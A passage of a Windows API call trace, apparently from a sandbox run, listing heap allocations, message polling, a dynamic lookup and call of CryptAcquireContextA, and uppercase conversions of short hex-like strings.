hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0259.188] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466d90, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.189] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0259.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0259.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0259.189] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466d90, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0259.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0259.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0259.189] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0259.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0259.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0259.190] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad31c0) returned 1 [0259.191] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.191] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.191] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0259.191] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0259.191] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.192] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0259.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0259.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0259.192] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0259.192] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.192] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0259.193] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0259.193] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.193] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c90 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0259.193] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0259.193] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0259.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0259.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0259.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0259.193] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0259.194] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0259.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0259.194] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0259.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.194] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.198] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.199] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0259.199] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.199] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0259.199] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.199] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0259.200] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0259.200] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.200] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0259.200] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.200] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.200] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.200] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0259.200] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0259.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.201] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0259.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.201] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0259.201] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.201] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0259.202] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0259.202] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0259.202] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.202] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0259.202] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.202] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.202] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0259.203] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0259.203] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0259.203] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0259.203] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0259.203] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.203] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0259.204] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0259.204] 